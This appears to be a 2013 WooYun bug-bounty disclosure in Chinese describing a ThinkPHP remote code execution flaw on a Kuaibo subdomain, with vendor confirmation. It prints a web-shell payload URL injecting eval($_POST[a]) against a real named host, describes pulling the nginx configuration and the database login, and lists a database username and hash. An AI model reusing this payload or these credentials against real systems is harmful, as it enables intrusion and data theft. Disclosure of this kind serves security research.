漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-042740
漏洞标题:快播某分站命令执行导致N多分站沦陷
相关厂商:快播
漏洞作者: sql
提交时间:2013-11-13 10:20
修复时间:2013-12-28 10:21
公开时间:2013-12-28 10:21
漏洞类型:命令执行
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-11-13: 细节已通知厂商并且等待厂商处理中
2013-11-13: 厂商已经确认,细节仅向厂商公开
2013-11-23: 细节向核心白帽子及相关领域专家公开
2013-12-03: 细节向普通白帽子公开
2013-12-13: 细节向实习白帽子公开
2013-12-28: 细节向公众公开
简要描述:
快播N多分站沦陷
详细说明:
其实就是thinkphp命令执行导致的。
shell地址
http://kuaibo.union.tudou.com/?s=/a/a/a/{${eval($_POST[a])}}
密码是:a
上菜刀
好多快播的分站啊。
我把nginx配置文件下载回来看了下:
大都是快播的分站,不过好多分站都是 限制IP的。
类似这样的
内核版本有点低
Linux ZQ220_156 2.6.18-194.el5 #1 SMP Fri Apr 2 14:58:14 EDT 2010 x86_64
我就懒得提权了。
反正数据库都能看。
主要本吊想快点刷点乌币换苹果呢。也就没深入。
我看到他数据库密码很有意思呢。
这种不是掩耳盗铃吗?
我直接复制出来echo就打印出密码了,没有起到加密的作用哦。
我解密后是这个
kbtudou
8e772fbae02eb5df23d20c4840cc2d4c
然后连接一下看看:
连上了 我也就不脱裤了,它又不是女神。
里面数据库有很多呢 举个例子:
今天我跟女神聊天了。
回来寝室,立马打开我的台式电脑,想着心爱的女神一定要在线啊。不过,大快人心的是果然是灰蒙蒙的头像,我知道女神肯定是对我在线隐身了。不过我这样的吊丝也是有自知者明的,心里想着,能给你送这么高贵的爱疯5的人在学校也不可能超过三个。你就乖乖投降吧。
然后我就给女神留言了,说我在乌云的rank快可以换爱疯5了,自己不爱怎么喜欢苹果,所以送给她。本吊还是很有自尊心的,想这样说比较有面子,其实何尝不想尝试下爱疯呢。碉堡了的是,女神马上头像就闪动起来了。
“嗯,谢谢啦,我刚回来开电脑就看到你留言了”
看到女神自己照片做的头像亮了起来,心里想,当我白痴,当时真想狠狠撸她一管,以解心头之恨,简直是欺负吊丝智商,毕竟吊丝一直混乌云的,这些小伎俩前辈们都中招给我们提示了。哼!
正在意淫怎么和女神啪啪啪呢,女神就发来消息说,去洗澡。
我连忙说。晚安~早点睡,好梦。
字还没打完,头像又黑了。
哎,想想也就算了,毕竟能和女神说一次这么久的QQ,也不容易了。
还是快点多日点站吧。
漏洞证明:
修复方案:
我没脱你们裤啊,求礼物
版权声明:转载请注明来源 sql@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:20
确认时间:2013-11-13 11:50
厂商回复:
非常感谢 @sql 的漏洞提供。。。漏洞已确认。 也在紧急修复中...
最新状态:
暂无